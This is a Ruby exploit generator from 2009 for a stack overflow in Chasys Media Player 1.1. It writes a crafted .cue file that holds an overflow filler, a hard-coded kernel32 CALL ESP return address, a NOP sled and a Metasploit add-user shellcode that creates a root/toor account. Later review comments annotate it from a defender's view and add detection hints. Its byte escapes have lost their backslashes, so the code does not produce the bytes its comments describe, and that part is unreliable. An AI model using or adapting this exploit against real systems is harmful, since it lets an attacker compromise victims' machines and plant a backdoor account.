
# Title : Chasys Media Player 1.1 .cue File Stack Overflow Exploit
# Published : 2009-03-19
# Author : Stack


#!/usr/bin/env ruby
# Chasys Media Player 1.1 .cue file Stack Overflow Exploit
# By Stack
# Mountassif Moad
# cat thnx.txt
# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d
#
# Review notes (reading this proof of concept from the defender's side):
# - The script is a flat file generator: it reads a base name from stdin and
#   writes <Name>.cue, a playlist/cue-sheet stub whose "File1=" value is padded
#   far beyond what a normal cue sheet carries.
# - NOTE(review): in this copy every "\x.." escape has lost its backslash
#   ("x5B" instead of "\x5B"), so the literals below are plain ASCII text, not
#   the bytes the author's comments describe. Left untouched; the decoding
#   notes below refer to the intended bytes.
# - Detection angle: a .cue whose File1=/FILE line runs to hundreds of bytes,
#   followed by a run of 0x90 and an alphanumeric-looking blob, is the shape
#   of this trigger. The payload's advertised effect (see the generator
#   comment further down) is creation of a local user account, so an account
#   created by a media-player process is the host-side indicator.
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
# NOTE(review): gets returns nil at EOF (e.g. empty piped stdin), and .chomp
# then raises NoMethodError -- the script assumes an interactive run.
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.cue'
# Taken after the prompt returns, so "finished in" below is not a duration.
time1 = Time.new
$VERBOSE=nil  # silences Ruby interpreter warnings for the rest of the run
# Intended bytes decode to "[playlist]\rFile1=" -- the field whose oversized
# value triggers the overflow (the parser itself is not visible here).
Header1= "x5Bx70x6Cx61x79x6Cx69"+
         "x73x74x5Dx0Dx46x69x6C"+
   	 "x65x31x3D"
  
  
# Intended bytes decode to "\r\nTRACK 01 MODE1/2352\r\n   INDEX 01 00:00:00",
# a normal cue-sheet trailer, presumably so the file still looks valid.
Header2= "x0Dx0Ax54x52x41x43x4Bx20x30x31x20x4Dx4Fx44x45x31x2Fx32"+
         "x33x35x32x0Dx0Ax20x20x20x49x4Ex44x45x58x20x30x31"+
         "x20x30x30x3Ax30x30x3Ax30x30"
  
  
# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
# Per the generator line above: a Metasploit adduser payload (root/toor),
# 489 bytes, alphanumeric-encoded. Not verified here; treat it as opaque data.
Shellscode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"+
"x42x50x42x30x42x30x4bx38x45x54x4ex33x4bx38x4ex47"+
"x45x30x4ax57x41x50x4fx4ex4bx58x4fx54x4ax31x4bx48"+
"x4fx35x42x32x41x50x4bx4ex49x54x4bx58x46x53x4bx58"+
"x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x58x42x4c"+
"x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx33x46x45x46x42x46x50x45x57x45x4ex4bx48"+
"x4fx55x46x42x41x30x4bx4ex48x56x4bx48x4ex50x4bx34"+
"x4bx48x4fx35x4ex31x41x30x4bx4ex4bx48x4ex41x4bx58"+
"x41x30x4bx4ex49x38x4ex45x46x52x46x30x43x4cx41x53"+
"x42x4cx46x36x4bx38x42x44x42x53x45x38x42x4cx4ax57"+
"x4ex50x4bx38x42x54x4ex50x4bx58x42x57x4ex41x4dx4a"+
"x4bx38x4ax56x4ax30x4bx4ex49x30x4bx48x42x58x42x4b"+
"x42x50x42x30x42x50x4bx48x4ax46x4ex43x4fx35x41x53"+
"x48x4fx42x46x48x55x49x48x4ax4fx43x48x42x4cx4bx37"+
"x42x55x4ax56x42x4fx4cx58x46x50x4fx45x4ax36x4ax39"+
"x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x4dx46"+
"x46x56x50x52x45x36x4ax47x45x46x42x52x4fx32x43x46"+
"x42x52x50x56x45x56x46x37x42x52x45x57x43x57x45x46"+
"x44x37x42x32x44x47x4fx46x4fx56x46x37x42x32x46x37"+
"x4fx36x4fx56x44x57x42x52x4fx42x41x44x46x54x46x34"+
"x42x52x48x52x48x52x42x32x50x56x45x36x46x37x42x52"+
"x4ex36x4fx46x43x56x41x56x4ex36x47x36x44x57x4fx36"+
"x45x57x42x47x42x52x41x34x46x46x4dx36x49x46x50x56"+
"x49x36x43x47x46x47x44x37x41x36x46x57x4fx56x44x57"+
"x43x47x42x32x44x57x4fx56x4fx46x46x47x42x32x4fx32"+
"x41x54x46x54x46x54x42x50x5a"
# Filler intended as 260 bytes of 0x41 ('A'); as written (escape lost) it is
# the three-character text "x41" repeated, i.e. 780 characters.
Over     = "x41" * 260
# Intended as 20 NOP bytes (0x90) ahead of the payload.
Nop      = "x90" * 20
# Hard-coded address; the author's comment identifies it as a CALL ESP inside
# kernel32.dll for one specific SP2 build (FR & EN). Being build-specific, the
# file is not universal, and randomized module bases defeat a fixed address.
Ret      = "x5Dx38x82x7C" # CALL ESP kernel32.dll Sp 2 FR & EN
   # "x35x16x39x77" # CALL ESP Universel If box Have .Net 2
   # ( this is my methode if i dont find an universel address in app i find adress
   # in some famouse softwar who the victime 90 % install it )

# Final layout: Header1 | filler | return address | NOP run | payload | Header2.
Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2
# Writes <Name>.cue in the current directory; the two status lines are printed
# inside the block, before the handle is closed.
File.open( files+".cue", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".cue :d"
end
